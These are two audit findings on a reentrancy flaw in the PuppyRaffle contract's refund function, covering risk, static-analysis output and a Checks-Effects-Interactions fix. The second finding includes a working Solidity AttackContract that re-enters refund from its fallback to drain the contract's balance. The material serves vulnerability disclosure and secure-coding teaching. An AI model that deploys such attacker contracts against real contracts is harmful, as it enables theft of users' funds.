Reentrancy vulnerability in `PuppyRaffle::refund` allows an attacker to drain the contract balance
The refund() function sends value before updating the state variable thus this can allow an attacker to call the function multiple times before the state is updated.
Description
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The
refundfunction is intended to allow active participants to withdraw their entrance fee and exit the raffle. It identifies the player by their index in theplayersarray, sends them theentranceFee, and then sets their position in the array toaddress(0). -
The function sends the
entranceFeeusing.sendValue()before updating the player's status in theplayersarray. This violates the Checks-Effects-Interactions (CEI) pattern, allowing a malicious contract to re-enter therefundfunction multiple times before its address is cleared from the array.
Risk
Likelihood: High
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A malicious contract enters the raffle.
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The malicious contract calls
refundand implements areceiveorfallbackfunction that callsrefundagain.
Impact: High
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Total loss of funds: An attacker can recursively call
refunduntil the entire contract balance is drained. -
Denial of Service: Legitimate players will be unable to receive their refunds or winnings because the contract has no remaining balance.
Proof of Concept
The following PoC demonstrates a malicious contract ReentrancyAttacker entering the raffle and recursively calling refund to drain all funds from PuppyRaffle.
Recommended Mitigation
Adhere to the Checks-Effects-Interactions (CEI) pattern by updating the state before performing the external call.
Additionally, consider adding a reentrancy guard from OpenZeppelin.
Lead Judging Commences
[H-02] Reentrancy Vulnerability In refund() function
## Description The `PuppyRaffle::refund()` function doesn't have any mechanism to prevent a reentrancy attack and doesn't follow the Check-effects-interactions pattern ## Vulnerability Details ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); payable(msg.sender).sendValue(entranceFee); players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); } ``` In the provided PuppyRaffle contract is potentially vulnerable to reentrancy attacks. This is because it first sends Ether to msg.sender and then updates the state of the contract.a malicious contract could re-enter the refund function before the state is updated. ## Impact If exploited, this vulnerability could allow a malicious contract to drain Ether from the PuppyRaffle contract, leading to loss of funds for the contract and its users. ```javascript PuppyRaffle.players (src/PuppyRaffle.sol#23) can be used in cross function reentrancies: - PuppyRaffle.enterRaffle(address[]) (src/PuppyRaffle.sol#79-92) - PuppyRaffle.getActivePlayerIndex(address) (src/PuppyRaffle.sol#110-117) - PuppyRaffle.players (src/PuppyRaffle.sol#23) - PuppyRaffle.refund(uint256) (src/PuppyRaffle.sol#96-105) - PuppyRaffle.selectWinner() (src/PuppyRaffle.sol#125-154) ``` ## POC <details> ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.7.6; import "./PuppyRaffle.sol"; contract AttackContract { PuppyRaffle public puppyRaffle; uint256 public receivedEther; constructor(PuppyRaffle _puppyRaffle) { puppyRaffle = _puppyRaffle; } function attack() public payable { require(msg.value > 0); // Create a dynamic array and push the sender's address address[] memory players = new address[](1); players[0] = address(this); puppyRaffle.enterRaffle{value: msg.value}(players); } fallback() external payable { if (address(puppyRaffle).balance >= msg.value) { receivedEther += msg.value; // Find the index of the sender's address uint256 playerIndex = puppyRaffle.getActivePlayerIndex(address(this)); if (playerIndex > 0) { // Refund the sender if they are in the raffle puppyRaffle.refund(playerIndex); } } } } ``` we create a malicious contract (AttackContract) that enters the raffle and then uses its fallback function to repeatedly call refund before the PuppyRaffle contract has a chance to update its state. </details> ## Recommendations To mitigate the reentrancy vulnerability, you should follow the Checks-Effects-Interactions pattern. This pattern suggests that you should make any state changes before calling external contracts or sending Ether. Here's how you can modify the refund function: ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); // Update the state before sending Ether players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); // Now it's safe to send Ether (bool success, ) = payable(msg.sender).call{value: entranceFee}(""); require(success, "PuppyRaffle: Failed to refund"); } ``` This way, even if the msg.sender is a malicious contract that tries to re-enter the refund function, it will fail the require check because the player's address has already been set to address(0).Also we changed the event is emitted before the external call, and the external call is the last step in the function. This mitigates the risk of a reentrancy attack.
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